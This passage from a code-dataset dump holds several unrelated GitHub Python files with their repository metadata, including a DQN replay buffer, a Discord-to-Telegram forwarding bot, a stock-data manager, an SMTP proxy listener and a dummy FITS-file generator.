Meaning if interesting samples occur 3% of the time, boost the preceding 33 samples\n            uninterestingSampleRange = max(1, len(self.samples) // max(1, self.numInterestingSamples))  # integer division: range() needs an int\n            for i in range(uninterestingSampleRange, 0, -1):\n                index = len(self.samples) - i\n                if index < 1:\n                    break\n                # This is an exponential that ranges from 3.0 to 1.01 over the domain of [0, uninterestingSampleRange]\n                # So the interesting sample gets a 3x boost, and the one furthest away gets a 1% boost\n                boost = 1.0 + 3.0/(math.exp(i/(uninterestingSampleRange/6.0)))\n                self.samples[index].weight *= boost\n                self.samples[index].cumulativeWeight = self.samples[index].weight + self.samples[index - 1].cumulativeWeight\n    \n    def _truncateListIfNecessary(self):\n        # premature optimization alert :-), don't truncate on each\n        # added sample since (I assume) it requires a memory copy of the list (probably 8mb)\n        if len(self.samples) > self.maxSamples * 1.05:\n            truncatedWeight = 0\n            # Before truncating the list, correct self.numInterestingSamples, and prepare\n            # for correcting the cumulativeWeights of the remaining samples\n            for i in range(self.maxSamples, len(self.samples)):\n                truncatedWeight += self.samples[i].weight\n                if self.samples[i].isInteresting():\n                    self.numInterestingSamples -= 1\n\n            # Truncate the list\n            self.samples = self.samples[(len(self.samples) - self.maxSamples):]\n            \n            # Correct cumulativeWeights\n            for sample in self.samples:\n                sample.cumulativeWeight -= truncatedWeight\n    \n    def drawBatch(self, batchSize):\n        if batchSize > len(self.samples):\n            raise IndexError('Too few samples (%d) to draw a batch of %d' % (len(self.samples), batchSize))\n        \n        self.batchesDrawn += 1\n        \n        if self.prioritizedReplay:\n            return self._drawPrioritizedBatch(batchSize)\n        else:\n            return random.sample(self.samples, batchSize)\n\n    # The nature paper doesn't do this but they mention the idea.\n    # This particular approach and the weighting I am using is a totally\n    # uninformed fabrication on my part. 
There is probably a more\n # principled way to do this\n def _drawPrioritizedBatch(self, batchSize):\n batch = []\n probe = Sample(None, 0, 0, None, False)\n while len(batch) < batchSize:\n probe.cumulativeWeight = random.uniform(0, self.samples[-1].cumulativeWeight)\n index = bisect.bisect_right(self.samples, probe, 0, len(self.samples) - 1)\n sample = self.samples[index]\n sample.weight = max(1, .8 * sample.weight)\n if sample not in batch:\n batch.append(sample)\n\n if self.batchesDrawn % 100 == 0:\n cumulative = 0\n for sample in self.samples:\n cumulative += sample.weight\n sample.cumulativeWeight = cumulative\n return batch\n \n def _printBatchWeight(self, batch):\n batchWeight = 0\n for i in range(0, len(batch)):\n batchWeight += batch[i].weight\n print('batch weight: %f' % batchWeight)\n","repo_name":"gtoubassi/dqn-atari","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"32"} +{"seq_id":"43665490335","text":"import string\r\n\r\n\r\ndef default_hasher(value, table_size):\r\n character_set = ''.join(\r\n list(str(i) for i in range(10))) + ' ' + string.ascii_lowercase + string.punctuation.replace('\\\\', '')\r\n char_to_index = {char: index for index, char in enumerate(character_set)}\r\n\r\n value = value.lower()\r\n res = sum(char_to_index[char] * pow(31, i) for i, char in enumerate(value[::-1], start=1))\r\n\r\n return res % table_size\r\n","repo_name":"Pr1ncee/AOIS","sub_path":"lab6/src/hasher.py","file_name":"hasher.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44244434829","text":"import pymysql.cursors\nfrom util.db import get_connection\n\nclass Attendance_Master:\n\n # constructor\n def __init__(self, user_id = \"\", summary = \"\", start_time = \"\", end_time = \"\", rest_time = \"\", work_time = \"\"):\n self.conn = get_connection()\n self.user_id = user_id\n self.summary = summary\n self.start_time = start_time\n self.end_time = end_time\n self.rest_time = rest_time\n self.work_time = work_time\n \n # ユーザIDで勤怠マスタを取得\n def get_by_id(self, user_id):\n\n # 勤怠マスタ取得\n try:\n with self.conn.cursor() as cursor:\n sql = \"SELECT * FROM attendance_master WHERE user_id = %s\"\n cursor.execute(sql, user_id)\n result = cursor.fetchone()\n finally:\n self.conn.close()\n\n # 勤怠マスタがない場合はデフォルト値をセット\n if not result:\n return Attendance_Master(\n user_id=user_id,\n summary=\"作業\",\n start_time=\"09:00\",\n end_time=\"18:00\",\n rest_time=\"01:00\",\n work_time=\"08:00\"\n )\n \n # 勤怠マスタを返却\n return Attendance_Master(\n user_id=result['user_id'],\n summary=result['summary'],\n start_time=result['start_time'],\n end_time=result['end_time'],\n rest_time=result['rest_time'],\n work_time=result['work_time']\n )\n\n # ユーザIDで勤怠マスタを取得\n def save(self):\n\n # 勤怠の存在チェック\n check = self.check_attendance_master(self.user_id)\n\n # 勤怠マスタ取得\n try:\n with self.conn.cursor() as cursor:\n\n # 勤怠がなかった場合はinsertする\n if not check:\n # insert\n sql = \"INSERT INTO attendance_master (`user_id`, `summary`, `start_time`, `end_time`, `rest_time`, `work_time`) VALUES (%s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, (self.user_id, self.summary, self.start_time, self.end_time, self.rest_time, self.work_time))\n self.conn.commit()\n else:\n # update\n sql = \"UPDATE attendance_master SET `user_id`= %s, `summary`= %s, `start_time`= %s, `end_time`= %s, `rest_time`= %s, `work_time`= %s 
WHERE user_id = %s\"\n cursor.execute(sql, (self.user_id, self.summary, self.start_time, self.end_time, self.rest_time, self.work_time, self.user_id))\n self.conn.commit()\n finally:\n self.conn.close()\n\n # 勤怠マスタの存在チェック\n def check_attendance_master(self, user_id):\n with self.conn.cursor() as cursor:\n sql = \"SELECT * FROM attendance_master WHERE user_id = %s\"\n cursor.execute(sql, user_id)\n result = cursor.fetchone()\n\n if not result:\n return False\n\n return True\n","repo_name":"yugeee/forgotten_api","sub_path":"models/attendance_master.py","file_name":"attendance_master.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19233210171","text":"\"\"\"Functional tests for PDFs in pdf folder.\"\"\"\n\nfrom datetime import datetime\n\nfrom libpdf import load\nfrom libpdf.models.chapter import Chapter\nfrom libpdf.models.file import File, FileMeta\nfrom libpdf.models.horizontal_box import HorizontalBox\nfrom libpdf.models.page import Page\nfrom libpdf.models.paragraph import Paragraph\nfrom libpdf.models.position import Position\nfrom libpdf.models.root import Root\nfrom libpdf.models.table import Cell, Table\n\nfrom tests.conftest import PDF_LOREM_IPSUM\n\n\ndef test_lorem_ipsum():\n \"\"\"Test if the library reads all content from input PDF correctly.\"\"\"\n file = File(name='lorem-ipsum.pdf', path='/home/marco/ub/libpdf/tests/pdf/lorem-ipsum.pdf', page_count=2)\n file_meta = FileMeta(\n author=None,\n title=None,\n subject=None,\n creator='LaTeX with hyperref package',\n producer='pdfTeX-1.40.16',\n keywords=None,\n creation_date=datetime(2017, 5, 9, 13, 57, 58),\n modified_date=datetime(2017, 5, 9, 13, 57, 58),\n trapped=False,\n )\n file.file_meta = file_meta\n # file_meta.b_file = file # does not yet work because field is missing\n root = Root(file=file, pages=[], content=[])\n\n # reverse engineer content to make full comarison\n # create object first\n dummy_page = Page(1, 700, 900)\n dummy_pos = Position(10, 10, 20, 20, dummy_page)\n dummy_links = []\n dummy_hbox = HorizontalBox(None)\n cell1_1 = Cell(1, 1, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell2_6 = Cell(2, 6, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell6_2 = Cell(6, 2, dummy_pos, dummy_links, textbox=dummy_hbox)\n cell18_7 = Cell(18, 7, dummy_pos, dummy_links, textbox=dummy_hbox)\n table1 = Table(idx=1, cells=[cell1_1, cell2_6, cell6_2, cell18_7], position=dummy_pos)\n paragraph1 = Paragraph(\n idx=1,\n links=dummy_links,\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter1 = Chapter(\n title='Ipsum labore ut consectetur.',\n number='1',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter2 = Chapter(\n title='Quiquia adipisci numquam tempora dolore magnam.',\n number='2',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n chapter2_1 = Chapter(\n title='Etincidunt consectetur porro velit sed quaerat.',\n number='2.1',\n position=dummy_pos,\n textbox=dummy_hbox,\n )\n\n # create the right, ordered structure\n chapter2.content.append(chapter2_1) # chapter2_1 is below chapter2\n root.content.append(table1) # comes first\n root.content.append(paragraph1) # comes before first chapter\n root.content.append(chapter1)\n root.content.append(chapter2)\n\n # load PDF\n objects = load(PDF_LOREM_IPSUM)\n del objects # make pylint happy until implementation is finished\n\n # compare 
properties\n","repo_name":"useblocks/libpdf","sub_path":"tests/test_details.py","file_name":"test_details.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"14256172173","text":"import discord\nimport telegram\nimport os\n\n# Discord client setup\ndiscord_token = 'YOUR_DISCORD_TOKEN_HERE'\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Discord client is ready.')\n\n@client.event\nasync def on_message(message):\n if message.channel.id == 'TARGET_DISCORD_CHANNEL_ID_HERE':\n telegram_bot_token = os.environ['TELEGRAM_BOT_TOKEN']\n telegram_chat_id = os.environ['TELEGRAM_CHAT_ID']\n\n telegram_bot = telegram.Bot(token=telegram_bot_token)\n try:\n if message.content:\n telegram_bot.send_message(chat_id=telegram_chat_id, text=message.content)\n \n for attachment in message.attachments:\n telegram_bot.send_photo(chat_id=telegram_chat_id, photo=attachment.url)\n\n print('Message has been forwarded to Telegram.')\n except Exception as e:\n print(f'Error forwarding message to Telegram: {e}')\n\n# Telegram bot setup\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Started the bot!\")\n\nif __name__ == '__main__':\n telegram_bot_token = os.environ['TELEGRAM_BOT_TOKEN']\n updater = telegram.ext.Updater(token=telegram_bot_token, use_context=True)\n\n dispatcher = updater.dispatcher\n\n start_handler = telegram.ext.CommandHandler('start', start)\n dispatcher.add_handler(start_handler)\n\n updater.start_polling()\n","repo_name":"bhau7233/tg-resending-bot-repo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34334708678","text":"\"\"\"\nThe Body Mass Index (BMI) is one of the calculations used by doctors to assess an adult's health. 
The doctor measures the patient's height (in metres) and weight (in kilograms), then calculates the BMI using the formula:\n\n\\[BMI = \\frac{weight}{height \\times height}\\]\n\nWrite a program which takes the patient's weight and height as input, calculates the BMI, and displays the corresponding message from the table below.\nBMI Category \tMessage\nMore than \\(25\\) \tOverweight\nBetween \\(18.5\\) and \\(25.0\\) (inclusive) \tNormal weight\nLess than \\(18.5\\) \tUnderweight\n\"\"\"\n\nmyList = [float(input()), float(input())]\n\nbmi = myList[0]/(myList[1]*myList[1])\n\nif bmi > 25:\n print(\"Overweight\")\nelif bmi < 18.5:\n print(\"Underweight\")\nelse:\n print(\"Normal weight\")\n","repo_name":"JohnNajm/DMOJ","sub_path":"CCC/CCC '08 J1 - Body Mass Index.py","file_name":"CCC '08 J1 - Body Mass Index.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26163045603","text":"\nfrom datetime import datetime\nfrom pandas import DataFrame\nfrom src.tools.mongo_data_manager import MongoDataManager\nfrom datetime import datetime\nfrom src.stock_analizer.yahoo_finance.adjuster import Adjuster\nfrom src.tools.converter import Converter\nfrom pandas_datareader import data\nfrom pandas_datareader import Options\nimport pandas as pd\nfrom numpy import *\nimport sys\nimport os\n\n\nclass StockPricesDataManager(MongoDataManager):\n \"\"\"\n Manages company data writing and reading.\n \"\"\"\n\n PRICE_COLLECTION = \"stock_prices\"\n\n def __init__(self, database: str):\n MongoDataManager.__init__(self, database)\n self.collection = StockPricesDataManager.PRICE_COLLECTION\n\n @staticmethod\n def load_company_data(url: str):\n \"\"\"\n Loads data from csv file into numpy ndarray\n :param company: company name as string\n \"\"\"\n prices = []\n file = open(url)\n next(file)\n for line in file.readlines():\n line_elements = line.strip().split(',')\n if '' in line_elements:\n continue\n else:\n prices.append(array([Converter.string_to_date(line_elements[0]) ,float(line_elements[1]), float(line_elements[2]), float(line_elements[3]), float(line_elements[4]), float(line_elements[5]), str(line_elements[6])], dtype=object))\n return array(prices)\n\n @staticmethod\n def stocks_data_to_csv(stock_name: str, stock_companies: list, start_date: datetime, end_date: datetime, folder: str):\n \"\"\"\n Stores data from the web into csv files.\n :param company: stock name as a str from we want to get the data.\n :param stock_companies: stock companies names as strings\n \"\"\"\n not_parsed = []\n for i, company in enumerate(stock_companies):\n # company_df = data.DataReader(stock_name + ':{0}'.format(company), 'finance', start_date, end_date)\n company_df = data.DataReader([company], 'google', start_date, end_date)\n company_df = Adjuster.data_weekends_and_miss_data_adj(company_df, start_date, end_date, str(company))\n company_df['Name'] = company\n stock_companies_size = len(stock_companies)\n output_name = folder + company + '_' + str(stock_companies_size) + '_' + str(start_date.year) + '_' + str(end_date.year) + '_data.csv'\n company_df.to_csv(output_name)\n print(\"{} : parsed\".format(company))\n print(\"Companies not parsed: {}\".format(not_parsed))\n\n def stocks_data_to_mongo(self, collection: str, json_items: str):\n \"\"\"\n Saves data from csv files into mongo db.\n After parsing, removes data from the folder.\n \"\"\"\n self.save_items(collection, json_items)\n\n @staticmethod\n def get_s_and_p_names():\n 
\"\"\"\n Returns list with all S&P companies names.\n \"\"\"\n s_and_p = ['MMM', 'ABT', 'ABBV', 'ACN', 'ATVI', 'AYI', 'ADBE', 'AMD', 'AAP', 'AES',\n 'AET', 'AMG', 'AFL', 'A', 'APD', 'AKAM', 'ALK', 'ALB', 'ARE', 'ALXN', 'ALGN', 'ALLE',\n 'AGN', 'ADS', 'LNT', 'ALL', 'GOOGL', 'GOOG', 'MO', 'AMZN', 'AEE', 'AAL', 'AEP', 'AXP',\n 'AIG', 'AMT', 'AWK', 'AMP', 'ABC', 'AME', 'AMGN', 'APH', 'APC', 'ADI', 'ANDV', 'ANSS',\n 'ANTM', 'AON', 'AOS', 'APA', 'AIV', 'AAPL', 'AMAT', 'ADM', 'ARNC', 'AJG', 'AIZ', 'T',\n 'ADSK', 'ADP', 'AZO', 'AVB', 'AVY', 'BHGE', 'BLL', 'BAC', 'BK', 'BCR', 'BAX', 'BBT',\n 'BDX', 'BRK.B', 'BBY', 'BIIB', 'BLK', 'HRB', 'BA', 'BWA', 'BXP', 'BSX', 'BHF', 'BMY',\n 'AVGO', 'BF.B', 'CHRW', 'CA', 'COG', 'CPB', 'COF', 'CAH', 'CBOE', 'KMX', 'CCL', 'CAT',\n 'CBG', 'CBS', 'CELG', 'CNC', 'CNP', 'CTL', 'CERN', 'CF', 'SCHW', 'CHTR', 'CHK', 'CVX',\n 'CMG', 'CB', 'CHD', 'CI', 'XEC', 'CINF', 'CTAS', 'CSCO', 'C', 'CFG', 'CTXS', 'CLX',\n 'CME', 'CMS', 'COH', 'KO', 'CTSH', 'CL', 'CMCSA', 'CMA', 'CAG', 'CXO', 'COP', 'ED',\n 'STZ', 'COO', 'GLW', 'COST', 'COTY', 'CCI', 'CSRA', 'CSX', 'CMI', 'CVS', 'DHI', 'DHR',\n 'DRI', 'DVA', 'DE', 'DLPH', 'DAL', 'XRAY', 'DVN', 'DLR', 'DFS', 'DISCA', 'DISCK', 'DISH',\n 'DG', 'DLTR', 'D', 'DOV', 'DOW', 'DPS', 'DTE', 'DRE', 'DD', 'DUK', 'DXC', 'ETFC', 'EMN',\n 'ETN', 'EBAY', 'ECL', 'EIX', 'EW', 'EA', 'EMR', 'ETR', 'EVHC', 'EOG', 'EQT', 'EFX',\n 'EQIX', 'EQR', 'ESS', 'EL', 'ES', 'RE', 'EXC', 'EXPE', 'EXPD', 'ESRX', 'EXR', 'XOM',\n 'FFIV', 'FB', 'FAST', 'FRT', 'FDX', 'FIS', 'FITB', 'FE', 'FISV', 'FLIR', 'FLS', 'FLR',\n 'FMC', 'FL', 'F', 'FTV', 'FBHS', 'BEN', 'FCX', 'GPS', 'GRMN', 'IT', 'GD', 'GE', 'GGP',\n 'GIS', 'GM', 'GPC', 'GILD', 'GPN', 'GS', 'GT', 'GWW', 'HAL', 'HBI', 'HOG', 'HRS', 'HIG',\n 'HAS', 'HCA', 'HCP', 'HP', 'HSIC', 'HSY', 'HES', 'HPE', 'HLT', 'HOLX', 'HD', 'HON',\n 'HRL', 'HST', 'HPQ', 'HUM', 'HBAN', 'IDXX', 'INFO', 'ITW', 'ILMN', 'IR', 'INTC', 'ICE',\n 'IBM', 'INCY', 'IP', 'IPG', 'IFF', 'INTU', 'ISRG', 'IVZ', 'IRM', 'JEC', 'JBHT', 'SJM',\n 'JNJ', 'JCI', 'JPM', 'JNPR', 'KSU', 'K', 'KEY', 'KMB', 'KIM', 'KMI', 'KLAC', 'KSS', 'KHC',\n 'KR', 'LB', 'LLL', 'LH', 'LRCX', 'LEG', 'LEN', 'LVLT', 'LUK', 'LLY', 'LNC', 'LKQ', 'NYSE:LMT',\n 'L', 'LOW', 'LYB', 'MTB', 'MAC', 'M', 'MRO', 'MPC', 'MAR', 'MMC', 'MLM', 'MAS', 'MA', 'MAT',\n 'MKC', 'MCD', 'MCK', 'MDT', 'MRK', 'MET', 'MTD', 'MGM', 'KORS', 'MCHP', 'MU', 'MSFT', 'MAA',\n 'MHK', 'TAP', 'MDLZ', 'MON', 'MNST', 'MCO', 'MS', 'MOS', 'MSI', 'MYL', 'NDAQ', 'NOV', 'NAVI',\n 'NTAP', 'NFLX', 'NYSE:NWL', 'NFX', 'NEM', 'NWSA', 'NWS', 'NEE', 'NLSN', 'NKE', 'NI', 'NYSE:NBL',\n 'JWN',\n 'NSC', 'NTRS', 'NOC', 'NRG', 'NUE', 'NVDA', 'ORLY', 'OXY', 'OMC', 'OKE', 'ORCL', 'PCAR',\n 'PKG', 'PH', 'PDCO', 'PAYX', 'PYPL', 'PNR', 'PBCT', 'PEP', 'PKI', 'PRGO', 'PFE', 'PCG', 'PM',\n 'PSX', 'PNW', 'PXD', 'PNC', 'RL', 'PPG', 'PPL', 'PX', 'PCLN', 'PFG', 'PG', 'PGR', 'PLD', 'PRU',\n 'PEG', 'PSA', 'PHM', 'PVH', 'QRVO', 'PWR', 'QCOM', 'DGX', 'RRC', 'RJF', 'RTN', 'O', 'RHT', 'REG',\n 'REGN', 'RF', 'RSG', 'RMD', 'RHI', 'ROK', 'COL', 'ROP', 'ROST', 'RCL', 'CRM', 'SCG', 'SLB', 'SNI',\n 'STX', 'SEE', 'SRE', 'SHW', 'SIG', 'SPG', 'SWKS', 'SLG', 'SNA', 'SO', 'LUV', 'SPGI', 'SWK', 'SPLS',\n 'SBUX', 'STT', 'SRCL', 'SYK', 'STI', 'SYMC', 'SYF', 'SNPS', 'SYY', 'TROW', 'TGT', 'TEL', 'FTI',\n 'TXN', 'TXT', 'TMO', 'TIF', 'TWX', 'TJX', 'TMK', 'TSS', 'TSCO', 'TDG', 'TRV', 'TRIP', 'FOXA',\n 'FOX', 'TSN', 'UDR', 'ULTA', 'USB', 'UA', 'UAA', 'UNP', 'UAL', 'UNH', 'UPS', 'URI', 'UTX', 'UHS',\n 'UNM', 'VFC', 'VLO', 'VAR', 'VTR', 'VRSN', 'VRSK', 'VZ', 'VRTX', 'VIAB', 'V', 
'VNO', 'VMC', 'WMT',\n 'WBA', 'DIS', 'WM', 'WAT', 'WEC', 'WFC', 'HCN', 'WDC', 'WU', 'WRK', 'WY', 'WHR', 'WFM', 'WMB',\n 'WLTW', 'WYN', 'WYNN', 'XEL', 'XRX', 'XLNX', 'XL', 'XYL', 'YUM', 'ZBH', 'ZION', 'ZTS']\n return s_and_p\n\n @staticmethod\n def load_dividends(comps_list: list, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads companies dividends\n \"\"\"\n folder = \"../../resources/Stock Data/Company Dividends/\"\n print(\"Dividends parsing...\")\n for comp_name in comps_list:\n url = str(folder) + str(comp_name) + \"_data.csv\"\n try:\n f = data.DataReader(comp_name, 'yahoo-dividends', start_date, end_date)\n dividends = f[\"Dividends\"]\n if len(dividends) != 0:\n dividends.to_csv(url)\n print(\"Dividends for: {} parsed.\".format(comp_name))\n except:\n print(\"Problems with: {}\".format(comp_name))\n\n @staticmethod\n def load_options(comp_names: list):\n \"\"\"\n Loads instrument options\n \"\"\"\n folder = \"../../resources/Stock Data/Company Options/\"\n time = datetime.now()\n print(\"Options parsing...\")\n for comp_name in comp_names:\n try:\n url = str(folder) + str(comp_name) + \"_data.csv\"\n inst_options = Options(comp_name, 'yahoo')\n inst_options_data = inst_options.get_all_data()\n inst_options_data.to_csv(url)\n print(\"Options for : {} parsed.\".format(comp_name))\n except:\n print(\"Problems with: {}\".format(comp_name))\n\n def save_comp(self, comp_name, comp_data):\n \"\"\"\n Saves company data\n \"\"\"\n self.save_items(comp_name, comp_data)\n\n def load_comp_data(self, collection: str, comp_name: str):\n \"\"\"\n Loads all data associated with specified company\n \"\"\"\n query = {\"Name\" : comp_name}\n return self.load_items(collection, query)\n\n def load_comps_data_btn_dates(self, collection: str, comp_names: list, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads all data associated with specified companies.\n \"\"\"\n if start_date == None or end_date == None:\n comp_names = [{\"Name\": comp_name} for comp_name in comp_names]\n # query = {\"$or\": [{\"Name\": \"NSC\"}, {\"Name\": \"MMM\"}]}\n query = {\"$or\": comp_names}\n else:\n comp_names = [{\"Name\": comp_name} for comp_name in comp_names]\n query = {\"$and\" : [{\"$or\": comp_names}, {\"Date\" : {\"$gte\": start_date, \"$lt\" : end_date}}]}\n return self.load_items(collection, query)\n\n def load_comp_data_btn_dates(self, comp_name: str, start_date: datetime, end_date: datetime):\n \"\"\"\n Loads company data between specified date range.\n \"\"\"\n query = {'Name': comp_name, \"Date\" : {'$gte': start_date, '$lt': end_date}}\n return self.load_items(self.collection, query)\n\n def load_comp_data_btn_attr_values(self, comp_name: str, attr: str, min: float, max: float):\n \"\"\"\n Loads company data that's between specified range.\n \"\"\"\n query = {'Name': comp_name, attr : {'$gte': min, '$lt': max}}\n return self.load_items(self.collection, query)\n\n def load_comp_data_btn_vals_and_dates(self, comp_name: str, attr: str, start_date: datetime, end_date: datetime, min: float, max: float):\n \"\"\"\n Loads company data that's between specified range and between dates.\n \"\"\"\n query = {'Name': comp_name, attr : {'$gte': min, '$lt': max}}\n self.load_items(self.collection, query)\n","repo_name":"maciejbihun9/world_analizer","sub_path":"src/stock_analizer/google_finance/stock_analisis/stock_data_manager.py","file_name":"stock_data_manager.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
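The `StockPricesDataManager` record above composes its MongoDB filters from an exact `Name` match plus a `$gte`/`$lt` window on `Date`. A minimal usage sketch follows (assumptions: a reachable MongoDB instance, a hypothetical database name 'stocks', and that the inherited `MongoDataManager.load_items(collection, query)` is a thin wrapper over pymongo's `find()`):

from datetime import datetime

# Hypothetical driver code; StockPricesDataManager comes from the record above.
manager = StockPricesDataManager(database='stocks')

# The call below issues the filter:
#   {'Name': 'MMM', 'Date': {'$gte': start_date, '$lt': end_date}}
rows = manager.load_comp_data_btn_dates(
    comp_name='MMM',
    start_date=datetime(2000, 1, 1),
    end_date=datetime(2003, 12, 31),
)

Note that `load_comp_data_btn_vals_and_dates` in the same record builds an analogous query but never returns the result of `load_items`, so callers would always receive `None`.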
+{"seq_id":"74606602332","text":"class Solution:\n def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n count = collections.Counter()\n for cp in cpdomains:\n n, s = cp.split()\n count[s] += int(n)\n for i in range(len(s)):\n if s[i] == \".\":\n count[s[i+1:]] += int(n)\n return [\"%d %s\" % (count[k], k) for k in count]","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"subdomain-visit-count/subdomain-visit-count.py","file_name":"subdomain-visit-count.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"6029525404","text":"import socket\nfrom ClientToProxy import *\nfrom ProxyToSMTP import *\nimport threading\ndef listen(host,port):\n tcp_socket=socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)\n tcp_socket.bind((host, port))\n tcp_socket.listen()\n print(\"Start Listening \"+host+\":\"+str(port))\n while True:\n conn, (host,port) = tcp_socket.accept()\n print(\"\\r\\n===============ClientToProxy===============\")\n receive=Receive(conn)\n message = receive.get_message()\n conn.close()\n # print(message)\n if message:\n SMTP_host,SMTP_port= \"smtp.qq.com\",25\n send=Send(SMTP_host,SMTP_port)\n print(\"\\r\\n===============ProxyToSMTP===============\")\n send_thread = threading.Thread(target=send.SendToSMTP,args=(message,),daemon = True)\n send_thread.start()\n # send_thread.close()\n else:\n print(\"Please Resend\")\n continue","repo_name":"Magi2B0y/SMTP_Proxy","sub_path":"build_socket.py","file_name":"build_socket.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40832678153","text":"\"\"\"Kernel Phase FITS Format Test File\n\nThis module contains a single function which produces a test Kernel Phase FITS\nfile according to the specifications in the format document. \n\nExample\n-------\n\nTo produce the test file simply run the following: \n\n $ python dummyfile.py filename.fits \n\n\"\"\"\n\nimport fitsio \nimport argparse \nimport numpy as np\n\nfrom numpy.random import randint \n\ndef create_dummy(filename): \n \"\"\"Create dummy file \n\n This is the main function which takes in a name and produces the fake file. 
\n\n Parameters\n ----------\n filename (str) : the name of the dummy file \n\n \"\"\" \n\n #Create the parameters for the file \n num_kernels = randint(low=10, high=1000) \n num_frames = randint(low=5, high=50) \n num_pixels = 2**randint(low=2, high=8)\n num_apertures = randint(low=56, high=752) \n num_wavelengths = randint(low=1, high=11)\n num_uv = randint(low=100, high=200) \n \n #--- Required HDUs ---# \n primary = np.zeros((num_frames, num_wavelengths, num_pixels, num_pixels)) \n aperture = np.zeros((num_apertures, 3)) \n uv_points = np.zeros((num_uv, 3)) \n ker_mat = np.zeros((num_kernels, num_uv)) \n blm_mat = np.zeros((num_uv, num_apertures)) \n kp_data = np.zeros((num_frames, num_wavelengths, num_kernels)) \n kp_sigm = np.zeros((num_frames, num_wavelengths, num_kernels))\n detpa = np.zeros((num_frames)) \n cvis_data = np.zeros((2, num_frames, num_wavelengths, num_uv)) \n\n #CWAVEL is a table \n cwavel = {} \n cwavel[\"CWAVEL\"] = np.zeros(num_wavelengths)\n cwavel[\"DWAVEL\"] = np.zeros(num_wavelengths) \n \n #--- Optional HDUs ---# \n ka_data = kp_data\n ka_sigm = kp_sigm \n cal_mat = np.zeros((randint(low=2, high=20), num_kernels)) \n kp_cov = np.zeros((num_frames, num_wavelengths, num_kernels, num_kernels)) \n ka_cov = kp_cov \n full_cov = np.zeros((num_frames, num_wavelengths, 2, num_kernels, 2,\n num_kernels))\n \n #IMSHIFT is a table \n imshift = {} \n imshift[\"XSHIFT\"] = np.zeros(num_frames)\n imshift[\"YSHIFT\"] = np.zeros(num_frames) \n\n #Create the primary header \n prim_header = {\"PSCALE\":3.14, \"DIAM\":1.62, \"EXPTIME\":2.72, \"GAIN\":1.0,\n \"CONTENT\":\"KFITS1\"} \n\n #Open the file for writing\n with fitsio.FITS(filename, \"rw\") as f: \n \n #Required HDUs\n f.write(primary, header=prim_header, extname=\"PRIMARY\") \n f.write(aperture, extname=\"APERTURE\") \n f.write(uv_points, extname=\"UV-PLANE\") \n f.write(ker_mat, extname=\"KER-MAT\") \n f.write(blm_mat, extname=\"BLM-MAT\") \n f.write(kp_data, extname=\"KP-DATA\") \n f.write(kp_sigm, extname=\"KP-SIGM\") \n f.write(cwavel, extname=\"CWAVEL\")\n f.write(detpa, extname=\"DETPA\") \n f.write(cvis_data, extname=\"CVIS-DATA\") \n\n #Optional HDUs\n f.write(ka_data, extname=\"KA-DATA\") \n f.write(ka_sigm, extname=\"KA-SIGM\") \n f.write(cal_mat, extname=\"CAL-MAT\") \n f.write(kp_cov, extname=\"KP-COV\") \n f.write(ka_cov, extname=\"KA-COV\") \n f.write(full_cov, extname=\"FULL-COV\") \n f.write(imshift, extname=\"IMSHIFT\")\n \nif __name__ == \"__main__\": \n\n #Parse the inputted file names \n parser = argparse.ArgumentParser(\n description=\"Kernel phase FITS file validator.\"\n )\n\n parser.add_argument(\"files\", type=str, nargs=\"+\",\n help=\"Filename of the dummy file\"\n )\n \n args = parser.parse_args() \n\n #Iterate through the list of files and produce them \n for file_ in args.files:\n\n create_dummy(file_) \n \n","repo_name":"apchsh/kp_fits","sub_path":"dummyfile.py","file_name":"dummyfile.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7405355580","text":"\"\"\"\nSlow feature analysis\nC. Wu, B. Du, and L. Zhang, “Slow feature analysis for change detection in multispectral imagery,” IEEE Trans. Geosci. Remote Sens., vol. 52, no. 5, pp. 
